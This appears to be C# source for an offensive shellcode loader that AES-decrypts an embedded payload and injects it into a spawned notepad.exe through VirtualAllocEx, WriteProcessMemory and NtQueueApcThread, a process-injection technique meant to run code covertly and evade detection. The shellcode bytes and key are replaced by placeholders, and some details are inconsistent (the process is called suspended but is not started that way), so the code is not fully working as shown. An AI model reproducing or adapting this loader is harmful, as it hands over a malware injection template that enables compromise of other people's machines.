using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

class Program
{
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern IntPtr NtQueueApcThread(IntPtr hThread, IntPtr pfnAPC, IntPtr dwData);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint ResumeThread(IntPtr hThread);

    static void Main(string[] args)
    {
        // AES-encrypted shellcode (generated by the Python script)
        byte[] encryptedShellcode = new byte[] { 0x5f, Shellcode, 0xfd };

        // AES key (generated by the Python script)
        byte[] key = new byte[] { 0x6d, REDACTED 0x7e };

        // Decrypt the shellcode
        byte[] shellcode = DecryptShellcode(encryptedShellcode, key);

        // Step 1: Create a suspended process
        ProcessStartInfo psi = new ProcessStartInfo("C:\\Windows\\System32\\notepad.exe");
        psi.CreateNoWindow = true;
        psi.UseShellExecute = false;
        Process? process = Process.Start(psi);

        if (process == null)
        {
            Console.WriteLine("[-] Failed to start process.");
            return;
        }

        IntPtr hProcess = OpenProcess(0xFFFF, false, process.Id); // PROCESS_ALL_ACCESS
        if (hProcess == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to open process.");
            return;
        }

        // Step 2: Allocate memory in the target process
        IntPtr pRemoteMemory = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40); // MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
        if (pRemoteMemory == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to allocate memory.");
            CloseHandle(hProcess);
            return;
        }

        // Step 3: Write shellcode into the allocated memory
        if (!WriteProcessMemory(hProcess, pRemoteMemory, shellcode, (uint)shellcode.Length, out IntPtr bytesWritten))
        {
            Console.WriteLine("[-] Failed to write shellcode.");
            CloseHandle(hProcess);
            return;
        }

        // Step 4: Queue an APC to execute the shellcode
        IntPtr hThread = OpenThread(0x1F03FF, false, process.Threads[0].Id); // THREAD_ALL_ACCESS
        if (hThread == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to open thread.");
            CloseHandle(hProcess);
            return;
        }

        NtQueueApcThread(hThread, pRemoteMemory, IntPtr.Zero);

        // Step 5: Resume the thread to trigger the APC
        ResumeThread(hThread);

        // Cleanup
        CloseHandle(hThread);
        CloseHandle(hProcess);

        Console.WriteLine("[+] Shellcode executed successfully.");
    }

    static byte[] DecryptShellcode(byte[] encryptedShellcode, byte[] key)
    {
        using (SHA256 sha256 = SHA256.Create())
        {
            // Hash the key using SHA-256 (as done in the Python script)
            byte[] hashedKey = sha256.ComputeHash(key);

            using (Aes aes = Aes.Create())
            {
                aes.Key = hashedKey;
                aes.Mode = CipherMode.CBC;
                aes.Padding = PaddingMode.PKCS7;
                aes.IV = new byte[16]; // Null IV (16 bytes of zeros)

                using (ICryptoTransform decryptor = aes.CreateDecryptor())
                {
                    return decryptor.TransformFinalBlock(encryptedShellcode, 0, encryptedShellcode.Length);
                }
            }
        }
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenThread(uint dwDesiredAccess, bool bInheritHandle, int dwThreadId);
}
